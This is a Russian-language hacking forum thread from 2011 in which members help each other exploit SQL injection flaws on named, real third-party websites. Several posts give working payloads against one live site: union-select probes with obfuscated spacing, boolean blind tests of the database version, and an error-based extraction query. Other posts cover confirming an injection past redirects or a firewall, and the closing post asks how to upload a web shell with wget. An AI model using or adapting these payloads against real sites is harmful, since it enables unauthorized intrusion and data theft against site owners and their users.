 |
|
02.03.2011, 20:36
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 10
С нами:
8421163
Репутация:
0
|
|
Сообщение от попугай
Для начала нужно определить каким-либо образом действительно ли в скрипте идет перевод спецсимволов в сущности(аналог htmlspecialchars() в php)...
как это можно сделать ?
|
|
|
02.03.2011, 22:20
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Нашел какую то нестандартную скулю, ну или или ее подобие на нужном мне сайте.
http://www.bading.com/index.php?option=com_fireboard&Itemid=33&func=view &catid=2&id=667
После того как подставляю ' к func=view, сообщения ниже пропадают. Но если уберу &catid=2&id=667 сообщений и так не будет.
Подскажите пожалуйста, как с ней работать и скуля ли это вообще?
Добавлено через время
И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов.
http://www.boatquotes.com/marine-surveys.php?catid=5
|
|
|
|
02.03.2011, 23:02
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Fooog
И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов.
http://www.boatquotes.com/marine-surveys.php?catid=5
Думаю, что раскрутить её не получится.
|
|
|
|
02.03.2011, 23:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от FlaktW
Думаю, что раскрутить её не получится.
http://www.boatquotes.com/marine-surveys.php?catid=5/**/uNiOn/**/SeLeCt/**/1--+
Не могу понять логики запроса... Может кто сможет далее раскрутить.
Ну или можно крутить, как блайнд:
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=5--+ (true)
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=4--+ (false)
Попробуй сделать вывод в ошибку.
|
|
|
|
02.03.2011, 23:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 543
С нами:
8885780
Репутация:
672
|
|
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
|
|
|
|
03.03.2011, 00:02
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Konqi
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.
|
|
|
|
03.03.2011, 00:10
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 543
С нами:
8885780
Репутация:
672
|
|
Сообщение от FlaktW
Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.
а вообще вот
|
|
|
|
03.03.2011, 01:29
|
|
Новичок
Регистрация: 02.07.2009
Сообщений: 1
С нами:
8873682
Репутация:
0
|
|
Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку
/mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID% %5D'&url=980852'
кто реально может помочь пишите в личку дам полный линк
а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди
|
|
|
|
03.03.2011, 03:36
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от fin13
Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку
/mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID% %5D'&url=980852'
кто реально может помочь пишите в личку дам полный линк
а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди
А в чем проблема, что 404 или выкидывает?
1) Может быть WAF.
2) Если идет инклюд или открытие файла, а ты вставляешь кавычку или из-за кавычки SQL-запрос становиться неверным, то перекидывать на главную страницу.
Там может быть и нету иньекции, с чего ты взял что она есть? о_0
Ну или попробуй вместо кавычки подставить верный SQL-запрос (and 1=1), и неверный (and 1=2) если при первом не перекинуло на главную, а на 2ом перекинуло, то SQL-inject есть.
Удачи.
|
|
|
|
03.03.2011, 15:31
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
какие еще команды есть напободие wget?
можно ли этой командой залить полноценный шелл? можно примерчик?
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
